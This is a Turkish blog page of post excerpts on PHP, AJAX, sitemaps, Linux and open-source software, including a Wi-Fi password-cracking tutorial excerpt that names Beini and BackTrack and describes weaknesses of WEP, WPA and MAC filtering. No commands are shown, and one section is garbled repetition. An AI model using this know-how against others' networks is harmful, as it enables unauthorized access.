Reklam

Reklamlar

8 Haziran 2010 Salı

Beini-1.2.1 Alfa 2w Driver Wireless Şifre Kırma 8 Adım'da

Beini-1.2.1 Download


Beini 1.2.1 RT3070 Driver Final Download Alfa 2w Olanlar İçin



Usb Kurulum İçin Gerekli Olan Unetbootin Download

http://unetbootin.sourceforge.net/

Klasik ama: Neden PHP?

2000 senesinde perl ile cgi, web programcılığı ile tanışmamı sağladı. PHP zamanla isteklerin artması ve yazım şeklinin aşina olduğum ortama daha yakın olması dolayısı ile beni çekim alanına aldı ve geçen 5 sene içinde de beni bu alandan uzaklaşmamam için yeterince tatmin etti. Yakın zamanda hem IDE'sinin sağladıkları, hem de platformun kolaylıkları ve cazibesi yüzünden Asp.NET'e göz kırpmış olsam da bu hafta sonu yaşadığım tecrübe PHP'ye olan sevgimi tazeledi.
Tabii ki hafta sonu olanları anlatacağım ancak önce, web uygulamaları geliştirirken neden PHP kullandığıma daha derinlemesine değinmek istiyorum:
Kişisel nedenler:
Birinci sırada syntax yer alıyor. Dediğim gibi aşina olduğumuz ortamlar biz programcıları daha fazla çeker. Bu açıdan yazım şeklinin ve temel dil özelliklerinin C'ye benzemesi benim için PHPyi daha cazip kılıyordu.
Hızlı uygulama geliştirme imkanı ve kurulum:Öncelikle uygulama geliştirme ortamı olarak Zend Studio, programcıya planlama hariç bütün aşamalarda kolaylık sağlıyor. Uygulama geliştiriken veritabanı yönetimi sayesinde tek bir ide ile geliştirdiğiniz uygulamaya tam hakimiyeti Zend Studio sayesinde edinebiliyorsunuz. Yazılan kodun debug edilmesi ve çalıştığınız sayfa üzerinde ayrı ayrı yazılan her fonksiyonun performans analizini direkt olarak tarayıcı üzerinden yapabilme imkanı çok leziz. Kurulum sırasında ise Zend Encoder'ın sağladıkları her uygulama geliştiriciye lazım. Zira yazdığınız kodun şifrelenerek güvenliğinin sağlaması size ait olmayan platformlarda uygulamanızı çalınma tehlikesi olmadan gönül rahatlığı ile koşturabilmenizi sağlıyor. Kurulumdan sonra ise yine Zend ürünleri size inanılmaz avantajlar sağlıyor. Bunlara daha sonra uzun uzun değineceğim.
Kolay öğrenilmesi:Php herhangi bir web dili ile, belirli bir süre tecrübesi olan her programcı için maksimum bir hafta içinde öğrenilebilecek bir dil. Biliyorum kulağa iddalı geliyor ama doğru. Bir dilin kolay öğrenilebilir olması büyük bir avantaj. Biz Techinox olarak daha tecrübelilerin alttan gelenleri eğitimi sayesinde hem sektöre kalifiye elemanlar yetiştirmenin hazzını yaşıyoruz hem de bünyemizdeki çalışanların kendilerine, takım arkadaşlarına ve bize maksimım yararlı olmasını sağlıyoruz. Bu anlamda Php temel uygulama geliştirme ortamımız olduğu için daha kısa sürede maksimum işgücünü devreye alabiliyoruz.
Performans:Daha az kaynak ile yüksek performans sağlaması PHP'nin büyük projelerde kullanılabilmesi için sayılabilecek nedenlerden sadece biri. Tabii ki bu anlamda hemen diğer iki silahşör olan MySQL ve Apache'nin önemini de unutmamak gerekiyor.
Fiyat:
Bu üç silahşör de (PHP, MySQL ve Apache)açık kaynak kodlu olduğu için sizden ayrıca lisanslandırma ücretleri talep etmiyorlar bu anlamda uygulama geliştirdiğiniz kişilere daha avantajlı teklifler ile gidebilmenizi sağlıyor. Özellikle Türkiye gibi bir ortamda bence bu çok ciddi bir avantaj.
Opsiyonellik:Tabii ki gerektiği zaman profesyonel çözümlerle müşterinin marka isteklerini tatmin etmek mümkün. PHP size birçok profesyonel veritabanı (Oracle, DB2 vs.) ile beraber çalışma sağlayabildiği gibi Zend'in birazdan değineceğim profesyonel çözümleri ile de müşterinizin Açık kaynak kodlu ortama olan direnişini kırmanızı sağlıyor. Burada yine uygulama geliştirdiğiniz ortamında Türkiye olması ön plana çıkıyor. Şu ana kadar genel olarak iki tip müşteri ile aktif olarak çalışıyoruz. Birincisi fiyatın minimize olmasını isteyenler, ki bunlara sadece uygulama ve barındırma maliyetleri ile hizmet vermek üç silahşörümüzle gayet mümkün. İkincisi ise marka ile güvenin sağlanacağını düşünen ve bunda da kısmen haklı olan kurumsal müşteriler. Onlara da Zendin profesyonel çözümleri ve farklı veritabanı seçenekleri ile ulaşmak mümkün.
Şimdi gelelim bu hafta sonu olanlara. Müşterilerimizden www.pazaryerim.com sunucularını Zend Platformlandırdık. Zend Platform sağladıkları ile beni bir kere daha PHPnin çekim alanında kalmaya ikna etti. Gelelim Zend Platformun

PingSitemap: Yeni sayfalarınız için arama motorlarını haberdar edin

Sitemap'ın öneminden ve nasıl üreteceğinizden daha önce bahsetmiştim (

Dinamik sitemap.xml oluşturmak

).


Sitemap.xml dosyanızı oluşturdunuz peki sonra?


Tabiki arama motorları servislerinin botları sitenize geldiğinde ilk olarak sitemap.xml'inizi bulmaya çalışacak, bulduğu zaman da site indeksini hızlıca çıkaracaktır. Fakat botlar sık sık sayfalarınızı gezse de sitemap.xml'inizi her zaman anlık olarak kontrol etmezler.

Arama motorlarının ping servisleri vardır ve bu servisleri kullanarak sitemap.xml'inizin güncellendiğini, hemen kuyruğa alınmasını istediğinizi belirtebilirsiniz. Bu uygulamayı birçok büyük web servisi, wordpress, blogger gibi blog hizmeti veren servisler, hatta kendi sunucunuza kuracağınız wordpress de bunu yapmaktadır.

Yeni bir içerik girildiği zaman sitenize yeni sayfalar eklenmiş, bazı varolan sayfaların da güncellenmiş olması anlamına gelmektedir. Arama motorlarının bu değişiklikleri hemen tarafamasını isterseniz aSitemap'ın öneminden ve nasıl üreteceğinizden daha önce bahsetmiştim (Dinamik sitemap.xml oluşturmak).

Sitemap.xml dosyanızı oluşturdunuz peki sonra?


Tabiki arama motorları servislerinin botları sitenize geldiğinde ilk olarak sitemap.xml'inizi bulmaya çalışacak, bulduğu zaman da site indeksini hızlıca çıkaracaktır. Fakat botlar sık sık sayfalarınızı gezse de sitemap.xml'inizi her zaman anlık olarak kontrol etmezler.

Arama motorlarının ping servisleri vardır ve bu servisleri kullanarak sitemap.xml'inizin güncellendiğini, hemen kuyruğa alınmasını istediğinizi belirtebilirsiniz. Bu uygulamayı birçok büyük web servisi, wordpress, blogger gibi blog hizmeti veren servisler, hatta kendi sunucunuza kuracağınız wordpress de bunu yapmaktadır.

Yeni bir içerik girildiği zaman sitenize yeni sayfalar eklenmiş, bazı varolan sayfaların da güncellenmiş olması anlamına gelmektedir. Arama motorlarının bu değişiklikleri hemen tarafamasını isterseniz az sonra anlatacağım ufak teknikle bunu yapabilirsiniz.

Simple Pie Nedir?

Php ile yazılmış bir xml parser sınıfıdır. Spesifik olarak da RSS tipi xml dosyalarını okumak için tasarlanmış, cache gibi güzellikleri bulunan bir sınıftır. Bu sınıfı kullanarak bir rss dosyasını nasıl parse edeceğimizi basitçe göstereceğim.

Ya hep ya hiç : www kullanın veya kullanmayın

Günümüzde ajax, flash derken client side crossdomain istekler geziyor. Bunun gibi teknolojileri kullanan uygulamalarda sık karşılaştığımız bir sorun var. Mesela flash içinde, javascript dosyalarında veya php yönlendirmelerinde bir sürü yerde yönlendirme kullanıyoruz ve aslında farkında olmadığımız bir kullanımdan dolayı oturum, istek cevaplarının gelmemesi gibi hatalar alıyoruz. Farkında olmadığımız şey şu :

Dinamik sitemap.xml oluşturmak

Sitemap nedir önemi nedir" diyenler şuradan (Vikipedi: Site haritası) devam etsinler.

Şimdi gelelim öneminden çok üretilmesine. Basit bir xml aslında. Fakat eğer sürekli güncellenen yapıda bir siteniz var ise bu xml'i periyodik olarak yenilemeniz gerekir. Tabi ki yüzlerce sayfası olan bir sitede (örneğin blog) bu linklerin envanterini bir xml'de tutmak oldukça zor olacaktır.

Çoğu web uygulamasında sayfaların içerikleri veritabanında tutulan bilgilerin listelenmesi ve detay sayfalarından oluşmaktadır. Yazılar, Arşiv sayfaları, Fotograf sayfaları, Forumlar, forum konularının bulunduğu sayfalar vs. Bu sayfaları listeleyen/gösteren php dosyaları olduğunu düşünürsek sitemap.xml'i oluşturacak kodun bu içerikleri sadece adresleyerek listelemesini yapacak bir kod olduğunu söyleyebiliriz.

Bu içerikleri listeleyerek sadece o içeriklere ait sayfaların URL'lerini oluşturan bir php dosyası düşünün. Basitçe örnekleyeceğim.
Mesela forum adında bir tablonuz var ve bu forum'un site haritası için sadece URL'leri gerekli ve bunu oluşturan ufak bir kod vermek gerekirse :

PHP'de fonksiyonlar

onksiyonlar, matematikteki gibi bazı işlem gruplarını sık sık kullandığımız alanlarda bize oldukça kolaylık sağlar. PHP'de de aynı şekilde, belli işleri yapan ve sonuçta bazı durumlara göre uygulamanın ilerleyişini değiştiren çoğu işlemde kolaylık sağlar. Bu fonksiyonları komplike uygulamaların sık tekrarlanan parçaları olarak görebiliriz.
Fonksiyon yapılarını, aslında PHP içinde farkında olmadan, sık sık kullanıyoruz. (Biz her ne kadar farkında olmasak da onlar hep fonksiyondu ve fonksiyon olarak kalacaklar :-)

Wireless Şifre Kırma --- Resimli Anlatım

Kablosuz Ağlardaki Güvenlik Çeşitleri
Ev ve küçük ofislerde kablosuz internet ağlarını korumak için kullanılan en bilindik iki farklı şifreleme yöntemi vardır. WEP tekniği ve WPA tekniği…
WEP tekniğinde şifre 1`den 9`a kadar rakamlar ve A`dan F`ye kadar harflerden oluşur. Yani hexadecimal olarak yazılır. Kablosuz ağların kullanılmaya başladığı ilk döneminde ortaya çıkan bu teknik en zayıf şifreleme tekniğidir. Açıkları bilindiği için yerine WPA sistemi geliştirilmiştir. WPA sistemindeki şifrede her türlü karakter kullanılabilir ve kırılması daha zordur. Evet kırılması daha zordur ama yeteri kadar güçlü bir şifre kullanırsanız… şifreleme tekniklerinin dışında MAC adresine göre filtreleme yapmak da bir korunma yöntemi olarak sıkça kullanılır. Bu yöntemde router, Access point, PC gibi her ağ cihazının sahip olduğu ve dünyada bir eşi daha olmayan MAC adresinden faydalanılır. MAC adresi bir çeşit seri numarasıdır. Modemin ayarlarından, kablosuz ağa girişine izin verilen MAC adreslerini belirleyebilirsiniz. Bu sayede tanımadığınız bilgisayarların ağa girişini engellemiş olursunuz. Ama bu da çok basit şekilde aşılabilen bir yöntemdir, çünkü MAC adresi klonlanabilir. Bunun dışında RADIUS, RSN gibi kırılması çok daha zor olan güvenlik yöntemleri de kullanılır ancak bu yöntemlerin kullanımı sınırlıdır. Çünkü bu yöntemler ev ve küçük ofis kullanıcıları için uygulanamayacak kadar komplike çözümlerdir.
Yazının ilerleyen bölümlerinde bu güvenlik metotlarının nasıl kırıldığını okuyacaksınız. Ancak önce çok önemli bir uyarı yapmamız gerekiyor.
Bu yazıda anlatılan yöntemleri deneme ve geliştirme amaçlı olarak kendi ağınızda kullanabilir ve buna göre açıklarınızı tespit edip güvenlik önlemlerinizi artırabilirsiniz.
Diğer kablosuz ağlara izinsiz giriş yaptığınız takdirde yasalar karşısında suç işlemiş duruma düşersiniz. Bu yazıda anlatılan yöntemleri uyguladığınızda mutlaka giriş yapılan modem/router bu girişi tespit edecek ve kayıt altına alacaktır. Bu kayıtlar gerektiğinde delil olarak kullanılabilir. Bu yazının amacı, yeterli derecede güvenlik önlemi olmayan kablosuz ağların ne kadar kolay kırılabildiğini ispatlamaktır. Ayrıca bu yöntemleri denerken sisteminizde herhangi bir problem meydana gelirse, sorumluluk size aittir.
Ayrıca şunu da belirtelim ki, birçok nedenden dolayı burada anlattığımız yöntemleri birebir uygulayamama ihtimaliniz de var. Böyle bir durumla karşılaştığınızda konu çok derin olduğundan derin bir araştırmaya girmeniz gerekebilir. Biz yazımızda bu kompleks konuyu mümkün olduğunca basite indirgeyerek anlatmaya çalışacağız. Mantığını kavradıktan sonra geliştirmek size kalmış.
Bu uyarıları yaptıktan sonra yavaş yavaş kolları sıvama zamanı geldi demektir. Öncelikle alet çantamızda neler var, bir bakalım: Kablosuz ağları kırmak için pek çok farklı araç kullanılabilir. Ama biz BackTrack isimli Linux canlı CD`sinden faydalanacağız. BackTrack`i kullanıyoruz çünkü bu CD`de kullanacağımız bütün araçlar, bir arada bulunuyor. Eğer isterseniz bu yazıda adı geçen araçların Windows sürümlerini de bulabilirsiniz. Ama baştan söyleyelim; Windows araçları Linux`taki kadar güvenilir çalışmıyor.
İhtiyacınız Olan Tek Yazılım: BackTrack
BackTrack adlı Slackware tabanlı Linux sürümünün içinde kablosuz ağların şifreleri ile ilgili bütün araçlar bir arada bulunuyor. Ayrıca bir canlı CD olduğu için bu işlemleri yaparken bilgisayarınıza herhangi bir şey kurmak zorunda kalmıyorsunuz. Kısacası; kablosuz ağları kırmak için ihtiyacınız olan tek şey: BackTrack. Dergimizin bu ayki DVD`sinde ISO biçiminde bulabileceğiniz BackTrack`i öncelikle bir CD`ye yazdırmanız gerekecek. ISO kalıbını CD`ye yazdırmak konusunda bilgisi olmayanlar `ISO`yu CD`ye Yazmak` başlıklı kutudan faydalanabilirler.
Eğer BackTrack`i CD`ye yazdırdıysanız bir sonraki adıma geçebiliriz.

Linux Ubuntu Compiz Kullanımı 3D Masaüstü ve Pencere Görünümü (Video)

Ubuntunuza nasıl 3D yapabiliceğinizi bu videoda anlattım.
Bunu compiz olarak halledebileceksiniz..
Dailymotion
Rapidshare

Php Nedir ?

PHP (Personal Home Page)
Tarihçe
PHP, ilk olarak 1990’lı yılların ortalarında Rasmus Lerdorf tarafından geliştirilmeye başlanmıştır. Lerdorf’un amacı kişisel bilgilerini internet üzerinden yayınlamaktı. O tarihteki teknolojide, günümüzdeki gibi gelişmiş web tasarım yazılımlarının bulunmamasından dolayı , kişisel web sayfası yapmak çok daha zordu. Buradan yola çıkarak, kişisel web sayfası yapmak için bir yazılım hazırladı ve adına Personal Home Page (PHP) adını verdi. PHP, Perl dili üzerine kurulu bir dil olarak geliştirilmeye başlanmıştır. PHP’ nin çok tutulması üzerine web tasarımcılarının çok ihtiyacı olan, yani form yoluyla ziyaretçiden gelen bilgileri işlemeyi sağlayan eklemeler yapılarak adına PHP/FI (Form Interpreter) adını aldı. Kimileri tarafından programın bu versiyonu PHP2 olarak adlandırıldı. 1995 yılının ortalarında PHP Lerdorf’un kurmuş olduğu bir grup tarafından daha da geliştirildi. Bu sefer Perl dilindeki fonksiyonlardan tamamen arındırılmış ve Object Oriented (Nesneye Dayalı) bir dil haline getirildi.
Günümüzde PHP4 versiyonu geliştirilmiş durumdadır. PHP dili Linux gibi Açık Kaynak Kodlu bir dildir ve ücretsiz olarak dağıtılmaktadır ve geliştirilmektedir. Linux, Unix, Windows tabanlı işletim sistemlerinde çalışabilen versiyonları mevcuttur.

10 PHP code snippets for working with strings

Strings are a very important kind of data, and you have to deal with them daily with web development tasks. In this article, I have compiled 10 extremely useful functions and code snippets to make your php developer life easier.

Automatically remove html tags from a string

On user-submitted forms, you may want to remove all unnecessary html tags. Doing so is easy using the strip_tags() function:

AJAX – Sunucuya istek göndermek

AJAX – Sunucuya istek göndermekSunucuya bir istek göndermek için open() ve send() işlevlerini kullanırız.
open() işlevi üç parametre alır. İlk parametre istekte bulunurken hangi yöntemin kullanılacağını belirtir (GET yada POST). İkinci parametre sunucudaki betiğin url adresini belirtir. Üçüncü parametre ise isteğin asenkron (eşzamansız) olarak ele alınacağını belirtir. send() işlevi isteği sunucuya gönderir. Eğer HTML ve (eğer sunucuda PHP dilini kullanıyorsak) PHP dosyalarının aynı dizinde olduğunu varsayarsak kod şöyle olacaktır:

AJAX XMLHttpRequest

AJAX – XMLHttpRequest nesnesi hakkında
Sunucuya veri göndermeden önce, XMLHttpRequest nesnesinin üç önemli özelliğini açıklamamız gerekiyor.
onreadystatechange özelliğiSunucuya bir istek gönderilmesinden sonra, sunucudan dönen veriyi alabilecek bir işleve ihtiyacımız var.
onreadystatechange özelliği sunucunun yanıtını işleyecek olan fonksiyonu tutar. Aşağıdaki kod boş bir fonksiyon tanımlar ve aynı zamanda onreadystatechange özelliğini ayarlar:

AJAX – Tarayıcı Desteği

AJAX – Tarayıcı Desteği
AJAX ‘ın temeli XMLHttpRequest nesnesidir.
Farklı tarayıcılar XMLHttpRequest nesnesini yaratmak için farklı işlevler kullanırlar.
Internet Explorer bir ActiveXObject kullanırken, diğer tarayıcılar XMLHttpRequest adı verilen Javascript nesnesini kullanırlar.
Bu projeyi oluşturmak ve farklı tarayıcılarla başa çıkmak için bir “try – catch” ifadesi kullanacağız.
Önceden oluşturduğumuz “testAjax.htm” dosyamızı XMLHttpRequest nesnesini oluşturan Javascript kodumuzla güncelleyelim.:

İlk AJAX uygulamanız

Ajax ‘ın nasıl çalıştığını anlamak için küçük bir ajax uygulaması oluşturacağız.
İlk önce, username ve time adında iki metin girişi bulunan standart bir HTML formu oluşturacağız. username alanı kullanıcı tarafından doldurulacak ve time alanı AJAX tarafından doldurulacak.
Oluşturduğumuz HTML dosyasının adı “testAjax.htm” olsun (bu formda gönder tuşunun olmadığına dikkat edin!):

AJAX Http İstemleri

AJAX Http İstemleri kullanır
Geleneksel JavaScript kodlarında, eğer sunucudaki bir veritabanından yada dosyadan bilgi almak isterseniz, yada sunucuya kullanıcı girdisini göndermek isterseniz bir HTML formu oluşturup GET yada POST yöntemlerinden biriyle sunucuyla veri alışverişi yaparsınız. Kullanıcı veriyi göndermek/almak için formdaki “Gönder” vb. bir düğmeyi tıklar, sunucunun yanıtını bekler ve sonuçları yeni yüklenen sayfada görür.
Kullanıcının her veri girişinde sunucunun yeni bir sayfa oluşturmasını beklemesi nedeniyle geleneksel internet uygulamaları daha yavaş çalışabilir ve daha az kullanıcı dostu olabilir.

AJAX a giriş

AJAXAsynchronous JavaScript And XML” ‘in kısaltılmışıdır.
Derse başlamadan önce bilmeniz gerekenlerDerse başlamadan önce aşağıdakiler hakkında temel olarak bilgi sahibi olmanız gerekir:
HTML / XHTML
JavaScript

AJAX = Asynchronous JavaScript and XML
AJAX yeni bir programlama dili değildir, daha iyi, daha hızlı ve daha etkileşimli web uygulamaları geliştirmek için bir tekniktir.
AJAX ile Javascript kodunuz, XMLHttpRequest nesnesini kullanarak sunucuyla doğrudan iletişim kurabilir. Bu nesne ile javascript kodlarınız sayfa yenilenmeden bir sunucuyla veri alışverişi yapabilir.

Lisans Gerektirmeyen Programlar

NU Özgür Belgeleme Lisansı.Bu lisansın amacı, bir kullanıcı kılavuzuna, bir ders kitabı veya başka işlevsel ve faydalı bir belgeye, herkesin, etkili bir kullanım hakkıyla, ticari veya gayri-ticari, değiştirerek ya da olduğu gibi, almak ve tekrar dağıtmak özgürlüğü anlamında, serbest kullanım hakkı vermektir.İkincil olarak, bu Lisans, yazar ve yayıncının, başkaları tarafından yapılan değişiklikler sebebiyle sorumlu olduklarını düşünmeden, bir bakıma yaptıkları işten saygınlık kazanmalarını da sağlar

Açık Kaynak Programların Araştırılması

Açık Kaynak İşletim Sistemleri
Türkiye Bilişim’le, Bilişim Açık Kaynak Yazılımlarla Gelişir !
nsanlık, Bilim, Teknoloji, Bilgi, Bilişim ve İnternetin başını çektiği yeni bir toplum biçimine geçişin sancılarını çekiyor: Bilİgi Toplumu. Bilgi Toplumuna giden yolda ulaşımdan savunmaya, üretimden dağıtıma, eğitimden sağlığa, ticaretten kamu yönetimine, iletişimden eğlenceye yaşamın tüm boyutlarını düzenleyen akılllı cihaz ve sistemlerin önemli bir bileşeni yazılımdır. Açık kaynak kod yazılımlar, adı üstünde, kaynak kodları herkesin incelemesine ve kullanımına açık yazılımlardır. Bu tür yazılımların ayıredici özelliği kullanıcıya yazılımı değiştirme özgürlüğü sağlamasıdır. Acık kaynak kod yazılımlar, ücretsiz, uyarlanabilir, sağlam, hızlı ve güvenlidir. Açık kaynak kod dünyası, yeni bir yazılım üretme biçimi, yeni iş modelleri sunmaktadır. Dünyanın her tarafından bilişim uzmanlarınca imece yöntemi ile endüstri standartlarında geliştirilen açık kaynak kod yazılımları, insanlığın ortak malıdır.
Açık kaynak yazılımlar, en küçüğünden cep telefonu, saat gibi gömülü sistemlerden, en büyüğünden süperbilgisayarlara, ev kullanıcılarından KOBİ’lere, kamu kurumlarından her türden okullara, tüm kurum ve bireylerin rahatça kullanabileceği, gereksinimlere göre basitleştirilebilen, sağlamlaştırılabilen, güçlendirilebilen yazılımlardır. Açık kaynak kod yazılımlar, her alanda çözümler sunarak, yazılım tekellerine karşı tüketiciye seçenekler sunmaktadır. Almanya, İspanya, Meksika, Brezilya, Çin, Kore, Hindistan gibi bir çok ülke, kamu kurumlarında açık kaynak kod yazılımlarının kullanımını şimdiden benimsemiş ve bilgi toplumu stratejilerin bir parçası yapmışlardır. Avrupa Birliği, UNESCO, Dünya Bankası gibi kuruluşlar güvenlik ve tasarruf gibi gerekçelerle açık kaynak yazılımlarını önermektedir. Dünya üzerindeki hemen her ülke kendi gereksinimlerine göre açık kaynak kodlu bir Linux dağıtımı geliştirmiştir. Ülkemizde de TÜBİTAK’ın girişimi ile bu yönde ULUDAĞ: Ulusal Dağıtım Projesi başlatılmış ve bir Linux dağıtımı olan Pardus Ulusal İşletim Sistemi hazırlanmıştır. Ülkemizde açık kaynak kod camiası 10 yılı aşkın bir süredir bulunmakta, Turkuaz, Gelecek, İstanbulx, Boreas, Turkix gibi dağıtımlar ve başka açık kaynak kodlu yazılımlar ve uygulamalar geliştirilmekte, yerli açık kaynak firmaları kurulmaktadır.

Neden Linux En İyisi?

Bence, insanlar özgür ya da bedava olduğu için değil, Windows’ta olmayan güzel özellikleri sayesinde Linux’a geçecekler. İşte size Linux’un neden daha iyi olduğunun birkaç kanıtı!
Bence, insanlar özgür ya da bedava olduğu için değil, Windows’ta olmayan güzel özellikleri sayesinde Linux’a geçecekler. İşte size Linux’un neden daha iyi olduğunun birkaç kanıtı!
Bundan önce, eğer zaten tecrübeli bir Linux kullanıcıysanız belki buradakileri okumak istersiniz: Sık Sorulan Sorular.
(Açıklamayı görmek için resme tıklayın)

Gpl Nedir? Açık Kaynak Kod Nedir?

pl Nedir
Gpl’ nin açılımı General Public License yani Genel Kamu Lisansıdır.  Çıkış sebebi açık kaynaklı kodların kapatılıp ticaret için kullanılması durumundan hoşlanmayan Richard Stallman tarafından oluşturulmuştur. Anlıyacagınız üzere Gpl özgür yazılımı koruyan bir belgedir. Size şimdi GPL ‘ yi daha iyi tanımanız için  birkaç lisans ile ile karşılaştırma  yapılmış bi resmi göstermek istiyorum.

Konami Kodu İle Ziyaretçilerinizi Şaşırtın

Konami Kodu
Konami Kodu
Efsanevi oyun şirketi Konami’nin, oyunlarında kullandığı ‘hile’ kodu Konami Code , son zamanlarda internet üzerinde tekrar popüler olmaya başladı. Çoğu web sitesi, Konami Kodu ile ziyaretçilerine çeşitli süprizler hazırlıyor. Örneğin, JQUERY‘nin sitesine girip Konami Kodunu uygulayın.
Konami Kodu : YUKARI – YUKARI – AŞAĞI – AŞAĞI – SOL – SAĞ – SOL – SAĞ – B – A (Bazı sitelerde en sonda ENTER tuşuna basmak gerekiyor.)
Diğer Konami Kodu içeren sitelere bu adresten ulaşabilir (Siteye girmek için ne yapmanız gerekiyor bilin bakalım :) ) yada bildirgec’te
Konami Kodu
Konami Kodu
Efsanevi oyun şirketi Konami’nin, oyunlarında kullandığı ‘hile’ kodu Konami Code , son zamanlarda internet üzerinde tekrar popüler olmaya başladı. Çoğu web sitesi, Konami Kodu ile ziyaretçilerine çeşitli süprizler hazırlıyor. Örneğin, JQUERY‘nin sitesine girip Konami Kodunu uygulayın.

Htaccess İle Seo Dostu Url Yapma

Web sitelerinde çokca gördüğümüz php_ile_programlama.html yada index.php/php/kodkutuphanesi şeklindeki seo dostu url oluşturmak isteyip de bu konuda anlaşılır kaynak bulamayanlar için bu konuyu basitçe anlatacağım.
Bu şekilde urllere sahip olmak için .htaccess (hypertext access) dosyamızda birkaç ufak değişiklik yapmamız yeterlidir.Aslında htaccess birçok yeteneği olan apache sunucu ayar dosyasıdır.root dizininde bulunur ve sunucudaki ayarları yapılandırmayı sağlar. Biz şimdilik sadece yönlendirme özelliğini kullanacağız.
ÖNEMLİ: Eğer bu konuda bilgili değilseniz .htaccess dosyası ile oynamayınız.Yoksa web siteniz çalışmaz.

Kriz ve Yazılım araştırmasının sonuçları açıklandı

Yazılım yatırımı yapanlara karmaşık sistemler yerine esnek yerel çözümlerine yönelmelerini, proje maliyetleri ile karlılık arasındaki pozitif dengeyi kurmalarını ve e-iş modellerinde yetkinlik kazanmalarını öneren araştırma, Orta Amerika Bilimsel Araştırma ve Eğitim Merkezi Başkan Yardımcısı Dr. Fuat Alican tarafından hazırlandı. Araştırmanın yazılım firmalarına yönelik kriz reçetesinde ise; inovasyon, farklılaşma, kiralanabilen yazılım modelleri ve müşterileri kriz döneminde nakit akımı aracı olarak görmeyip onların gereksinimlerine odaklanma yer alıyor.
Türk yazılımının öncü kuruluşu Netsis’in sponsorluk desteğiyle Türkiye’de yayımlanan “Kriz ve Yazılım” başlıklı araştırma, adını ilk olarak 2006′da Yazılım Sanayicileri Derneği (YASAD) adına hazırlanan Türkiye Yazılım Stratejisi adlı eseriyle duyuran Orta Amerika Bilimsel Araştırma ve Eğitim Merkezi (CIFOCICA) Başkan Yardımcısı Dr. Fuat Alican tarafından küresel ve yerel ekonomide son dönemde yaşanan değişimler ve eğilimler dikkate alınarak hazırlandı. Araştırma raporu, krizin yazılım sektörüne etkilerinin yanı sıra şirketlerin ekonomik kriz döneminde yazılım kullanımı ile alabilecekleri önlemlere ışık tutuyor.
Yazılımcılar, krizde müşteri gereksinimlerine odaklanmalı

Açık Kaynak Tarihçesi

Açık Kaynak
 TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
Tarihçesi
Açık 
Kaynak TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
Tarihçesi
Açık 
Kaynak TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
TarihçesiAçık Kaynak 
Tarihçesi

PHP ile Ziyaretçi sayacı

Php ile hazırlanmış mysql kullanan ve ziyaretçilerimizi haricen listeleyebildiğimiz ve nereden giriş yaptıklarını görebildiğimiz güzel bir uygulama.
•Php ile hazırlanmış web sitenizde kullanabileceğiniz bir sayaç uygulamasıdır.
•Veri tabanı olarak mysql kullanılmaktadır.
•Aynı anda online kullanıcı sayısı, toplam kullanıcı sayısı, ziyaretçi ip, dün ve bugüne ait toplam tekil ziyaretçi sayısını gösterir.
•Ayrıca veri tabanına yapılan ziyaretçi kayıtlarını phpmyadmin’e girmeden görmenize olanak tanır.

W3C – XHTML Hataları ve Çözümleri

Bugün size W3C – XHTML Hataları ve Çözümleri adlı konuda bir kaç taktik göstericem. Yapımı gayet kolay ve bazı teknik hatalardan oluşan hataları düzeltip onarmaya çalışacaz. Ama ilk önce W3C nedir onu öğrenelim..

W3C Nedir?

W3C ; Web standartlarını belirleyen bir örgüt ismidir (diye biliyorum).

sql injection deneyenlerin ip banla

basit bişey yaptım amatörce paylaşım işe yarasın bari geliştiren olursa güzel bişey aslında
haber.php?Id=’a vs yani int olmayan degerler girildiginde adres satırına ip banlıyor. aynı ipten tekrar yaparsa veri tabanındaki saat güncelliyor
biraz ileri gidilip belli bir zaman sonra ip banı otomatik kaldırılabilir vs işte
ip.php

php ile oturum tanımlarken ilave güvenlik

php ile kod çalışıkren, güvenlik için sessionlara güvenmek de belli bir yere kadardır.
Session tanımlerken kendi güvenliğimizi de düşünmemiz lazım. Çünkü Apache sunucu her bir kişi için tek oturum tutar. Bunun anlamı aynı ip den giren kişi her sunucuya tek bir oturumla girer. Bu durumda oturum dizisi aşağıdaki gibi bir görünüm arzeder.

Php İle Gerçek IP Adresini Bulma

Uzun zamandır kullandığım ve sonuçlarından memnun kaldığım bir php fonksiyonunu sizlerle paylaşmak istedim. Php ile script yazmaya başlayanların oldukça işine yarayacağından eminim.
Fonksiyonumuz kullanıcının modeminin servis sağlayıcısından aldığı gerçek ip adresini göstermektedir. Hatta şirket hatlarında kullanılan 10.10.114.xxx veya 192.168.xxx.xxx tarzı ip adresletini bile göstermektedir. İnternet camiasında proxy denen meretten kurtulmanın yolu hiçbir zaman olmadığı gibi bunda da yoktur sanırım ama yine de fonksiyonun sonuçları tatmin edici durumda.

PHP ile Türkçe Gün ve Ay Gösterimi

Merhaba arkadaşlar,
PHP ile günleri veya ayları yazdırdığımızda ekrana çıktısı İngilizce olarak gelmektedir. Fakat PHP nin str_replace(); fonksiyonunu kullanarak İngilizce gelen verileri Türkçe olarak değiştirip ekrana yazdırarak tamamen Türkçe tarih elde edebiliriz..Gelelim yapılışına:
Temel mantık array içindeki verilerin yerlerini değiştirmek..İlk önce array içinde aynı sırada İnglizce ve Türkçe tarihleri değişkene aktardık.Sonra yine bir değişkene tarih yazdırmak için date(“d-M-Y”);
fonksiyonunu atadık.En son str_replace(); ile gelen verileri değiştirdik.

stripslashes() fonksiyonu nedir nasıl kullanılır ?

Veritabanı kayıt işlemlerinde tek tırnak ve çift tırnaklardan kaynaklı problemler yaşamamak için addslashes() ve stripslashes() fonksiyonlarını kullanıyoruz. addslashes() fonksiyonunu bilmeyenlerin öncelikle şurayı okumaları gerekmektedir.
